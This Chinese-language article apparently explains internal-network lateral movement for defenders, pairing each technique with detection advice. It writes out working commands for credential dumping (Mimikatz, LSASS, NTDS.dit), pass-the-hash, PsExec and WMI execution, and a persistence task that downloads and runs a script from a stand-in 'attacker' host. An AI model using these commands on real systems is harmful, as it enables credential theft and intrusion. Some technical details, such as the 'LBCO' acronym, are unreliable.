一、内网渗透横向攻击概述：定义与威胁模型

内网渗透横向攻击（Lateral Movement in Internal Networks）是攻击者突破边界防御后，通过技术手段在内网中横向扩展控制范围的过程。其核心目标是通过最小化暴露面，实现从单点突破到全网控制的转变。根据MITRE ATT&CK框架，横向移动属于”横向移动”战术阶段，典型技术包括Pass the Hash（哈希传递）、Remote Desktop Protocol（RDP）爆破、SMB协议利用等。

企业内网环境具有设备类型多样、权限管理复杂、通信协议混用的特点，为攻击者提供了丰富的攻击面。据Verizon 2023年数据泄露报告显示，62%的数据泄露事件涉及横向移动，平均停留时间达287天。这要求安全团队必须深入理解攻击链各环节，构建纵深防御体系。

二、攻击前奏：信息收集与内网测绘

1. 边界突破后的初始立足点

攻击者通常通过钓鱼邮件、0day漏洞或供应链攻击获取初始访问权限。例如，利用Exchange Server的ProxyShell漏洞（CVE-2021-34473）可绕过身份验证获取服务器控制权。获得立足点后，攻击者会立即进行环境探测。

2. 内网资产发现技术

• 主动扫描：使用Nmap进行端口扫描（nmap -sS -p 445,3389 192.168.1.0/24），识别SMB和RDP服务
• 被动监听：通过ARP欺骗（arpspoof -i eth0 -t 192.168.1.1 192.168.1.2）捕获网络流量
• LDAP枚举：利用BloodHound工具分析Active Directory权限关系
• DNS记录解析：通过dig axfr @dns_server domain.com获取内部域名记录

某金融行业案例显示，攻击者通过解析内部DNS记录发现测试环境服务器，利用未修复的Apache Struts2漏洞（CVE-2017-5638）实现横向跳跃。

3. 凭证收集与哈希转储

• 内存转储：使用Mimikatz的sekurlsa::logonpasswords命令提取明文凭证
• LSASS进程转储：通过procdump -ma lsass.exe lsass.dmp获取进程转储文件
• NTDS.dit提取：使用ntdsutil "ac in ntds" "ifm" "create full c:\temp" quit quit导出域数据库

安全建议：启用Credential Guard功能，限制LSASS进程访问权限，定期轮换服务账户密码。

三、横向移动核心技术解析

1. Pass the Hash攻击实现

# 使用Mimikatz的PtH功能
sekurlsa::pth /user:Administrator /domain:contoso.com /ntlm:a1b2c3d4e5f6 /run:powershell.exe

防御措施：

• 实施LBCO（Local Security Authority Local Security Policy）限制
• 禁用NTLM认证，强制使用Kerberos
• 部署Just-In-Time权限管理

2. WMI远程执行技术

# 通过WMI执行远程命令
Invoke-WmiMethod -Path Win32_Process -Name Create -ArgumentList "notepad.exe" -ComputerName 192.168.1.100

检测方案：

• 监控WMI事件ID 4648（显式凭证登录）
• 限制WMI命名空间访问权限
• 部署EDR解决方案拦截异常进程创建

3. PSExec与WinRM利用

# 使用PSExec横向移动
psexec.exe \\192.168.1.100 -u Administrator -p password cmd.exe

防御策略：

• 禁用TCP 445端口（SMB）外网访问
• 配置WinRM服务仅允许加密通道
• 实施网络分段控制

四、权限维持与持久化技术

1. 计划任务后门

# 创建持久化计划任务
$Action = New-ScheduledTaskAction -Execute "powershell.exe" -Argument "-WindowStyle Hidden -Command `"IEX (New-Object Net.WebClient).DownloadString('http://attacker/backdoor.ps1')`""
$Trigger = New-ScheduledTaskTrigger -AtStartup
Register-ScheduledTask -TaskName "UpdateChecker" -Action $Action -Trigger $Trigger -User "SYSTEM"

检测方法：

• 监控计划任务创建事件（Event ID 4698）
• 检查异常启动项（HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run）

2. 注册表自启动项

# 添加注册表自启动
Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" -Name "SecurityChecker" -Value "C:\Windows\Temp\malware.exe"

防御建议：

• 实施应用白名单控制
• 定期审计注册表关键项
• 使用Sysmon监控注册表修改

3. DLL劫持技术

攻击者通过替换合法DLL文件实现持久化。例如，替换C:\Windows\System32\wbem\WMIC.exe依赖的DLL。

检测方案：

• 监控异常DLL加载事件（Event ID 7）
• 实施文件完整性监控
• 使用Process Monitor跟踪DLL加载

五、防御体系构建建议

1. 零信任架构实施

• 实施持续身份验证机制
• 采用最小权限原则
• 部署微隔离技术

2. 检测与响应体系

• 部署UEBA（用户实体行为分析）系统
• 建立SOAR（安全编排自动化响应）流程
• 定期进行红蓝对抗演练

3. 员工安全意识培训

• 开展钓鱼模拟训练
• 制定安全操作规范
• 建立安全意识考核机制

某制造业企业通过实施零信任架构，将横向移动检测时间从平均72小时缩短至4小时，成功阻断3起APT攻击尝试。实践表明，构建”预防-检测-响应-恢复”的全生命周期防御体系至关重要。

六、未来趋势与应对

随着云原生环境的普及，攻击面正从传统内网向混合云架构扩展。容器逃逸、无服务器函数利用等新型攻击技术不断涌现。安全团队需要：

1. 部署云工作负载保护平台（CWPP）
2. 实施基础设施即代码（IaC）安全扫描
3. 建立跨云环境的统一安全策略

内网渗透横向攻击的防御是一场持久战，需要技术、流程、人员三方面的协同努力。通过持续优化防御体系，企业能够有效降低被攻击后的损失程度，将安全从被动响应转变为主动防控。